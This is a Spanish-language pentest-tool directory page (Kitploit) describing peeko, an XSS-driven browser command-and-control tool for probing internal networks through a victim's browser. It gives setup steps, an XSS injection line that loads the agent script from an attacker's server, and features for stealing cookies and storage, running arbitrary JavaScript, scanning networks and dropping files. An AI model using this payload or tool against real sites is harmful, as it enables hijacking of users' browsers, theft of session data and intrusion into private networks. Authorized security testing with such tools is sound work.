Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/b3rito/peeko
ReconocimientoMapeo de RedesEscaneo de PuertosMovimiento LateralExplotación de Aplicaciones WebExfiltración de DatosRecopilación de InformaciónPost-ExplotaciónPruebas de PenetraciónComando y Control
GitHubb3rito/peeko
230286hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

peeko

peeko – C2 XSS basado en navegador para exploración sigilosa de redes internas a través de un navegador infectado.

Ver Repositorio
Compartir

peeko

Versión: v1.1

peeko es una herramienta C2 (Comando y Control) impulsada por XSS basada en navegador que aprovecha el navegador de la víctima como un proxy sigiloso dentro de redes internas.

Mediante un payload XSS inyectado, peeko establece una conexión WebSocket a un servidor central, lo que permite a un atacante controlar de forma remota el navegador de la víctima para enviar peticiones a servicios internos, escanear redes, exfiltrar datos o incluso ejecutar JavaScript arbitrario, todo sin soltar un solo binario.


Características

  • Comunicación basada en WebSocket entre atacante y víctimas
  • El navegador de la víctima consulta URLs internas y escanea rangos de IP + puertos
  • Panel de control sencillo con:
    • Selector de víctimas
    • Consulta manual de URLs
    • Escáner de rangos de IP y puertos
    • Ejecución de JS personalizado (manual o automática)
    • Entrega de archivos (auto/manual)
    • Información del navegador y recopilación de tokens (cookies, almacenamiento, etc.)
    • Visor de logs con copiado/guardado como .txt o .json
  • Soporte HTTPS con certificados autofirmados
  • Ligero: un único archivo Python + recursos estáticos

Requisitos

  • Python 3.8+
  • OpenSSL
  • Linux/macOS (probado en sistemas basados en Debian)

Inicio Rápido

  1. Clona el repositorio:

    root@kitploit:~
    git clone https://github.com/b3rito/peeko.git
    cd peeko
    
  2. Instala las dependencias:

    root@kitploit:~
    make install
    
  3. (Opcional) Haz ejecutables los scripts:

    root@kitploit:~
    chmod +x gen-cert.sh start.sh
    
  4. Genera el certificado TLS autofirmado:

    root@kitploit:~
    make cert
    
  5. Reemplaza el marcador SERVER-IP:

    Abre y edita los siguientes archivos:

    • static/agent.js
    • static/control.html

    Reemplaza SERVER-IP con la IP/dominio de tu servidor:

    root@kitploit:~
    wss://SERVER-IP:8443/ws → wss://192.168.30.136:8443/ws
    
  6. Inicia el servidor:

    root@kitploit:~
    make run
    
  7. Abre el panel de control en tu navegador:

    root@kitploit:~
    https://192.168.30.136:8443/static/control.html
    
  8. Inyecta el agente (ejemplo XSS):

    root@kitploit:~
    <script src="https://192.168.30.136:8443/static/agent.js"></script>
    

Funciones del Panel de Control

Funciones Principales

  • Seleccionar y gestionar víctimas conectadas
  • Consultar cualquier URL HTTPS interna/externa a través de la víctima
  • Escanear rangos LAN: 192.168.1.0/24, 10.0.0.10-20, etc.
  • Escanear puertos o rangos específicos (p. ej., 80, 443,8000-8080)

Entrega de Archivos

  • Enviar archivos a la víctima (Base64 vía WebSocket)
  • El navegador de la víctima los descarga automáticamente
  • Soporta auto-subida al conectarse

Recopilación de Información

  • Recopilar User Agent, plataforma, referrer, cookies, local/sessionStorage
  • Ver resultados en JSON
  • Se activa manualmente o se recopila automáticamente al conectarse

Ejecución de JS Personalizado

  • Ejecutar JavaScript arbitrario en el navegador de la víctima
  • Usa el formato exec:... para enviarlo
  • Soporta auto-ejecución al conectarse
  • Ejemplo: exec:alert(document.cookie);

Registro (Logging)

  • Todo queda registrado (peticiones, respuestas, volcados de información)
  • Copiar o exportar logs como .txt o .json
  • Interfaz minimalista diseñada como un log de terminal

CORS y Mixed Content Explicados

Las políticas de los navegadores modernos afectan a lo que peeko puede acceder.

Respuestas CORS

Cabecera¿Puede leer el contenido?Notas
Access-Control-Allow-Origin: *✅Acceso completo a la respuesta
Sin cabecera⚠️La respuesta es opaca
Origen restringido❌Bloqueada o ilegible

Mixed Content

La víctima se conecta vía HTTPS. Si un objetivo escaneado solo usa HTTP:

  • El navegador bloqueará las peticiones de contenido mixto
  • peeko no puede leer desde endpoints http://
  • Al escanear, prefiere siempre objetivos que usen HTTPS

En la Práctica

Durante una prueba de penetración, si encuentras un servicio interno que responde con Access-Control-Allow-Origin: * y se sirve por HTTPS, entonces peeko se convierte en un proxy sigiloso capaz de exfiltrar datos internos directamente desde el navegador de la víctima, sin soltar archivos ni abrir conexiones salientes.


Estructura del Proyecto

root@kitploit:~
peeko/
├── main.py             → FastAPI WebSocket server  
├── start.sh            → Launch server  
├── gen-cert.sh         → Generate self-signed TLS certificate  
├── Makefile            → Install/run helpers  
├── requirements.txt    → Python dependencies  
├── certs/              → TLS key and cert will be stored here  
└── static/             → Browser client assets  
    ├── control.html    → Control panel (was attacker.html)  
    ├── infect.html     → Victim landing page  
    └── agent.js        → Victim agent script  

Flujo de Trabajo

  1. El atacante inyecta XSS (mediante vulnerabilidad almacenada o reflejada)
  2. El navegador de la víctima se conecta vía WebSocket al servidor peeko
  3. El panel de control permite al atacante:
    • Escanear la red
    • Consultar URLs
    • Volcar cookies y almacenamiento
    • Ejecutar JS arbitrario
    • Exfiltrar respuestas
    • Soltar archivos

Casos de Uso

  • Mapeo de red interna mediante XSS
  • Pivoting basado en navegador
  • Entrega silenciosa de archivos / dropper JS

Aviso Legal

Esta herramienta se proporciona únicamente con fines educativos y de pruebas autorizadas.
Cualquier uso de peeko fuera de entornos donde tengas permiso explícito está estrictamente prohibido.
Eres responsable de tus propios actos.


Autores

Escrito por b3rito en mes3hacklab y GioPpeTto

Descargar herramienta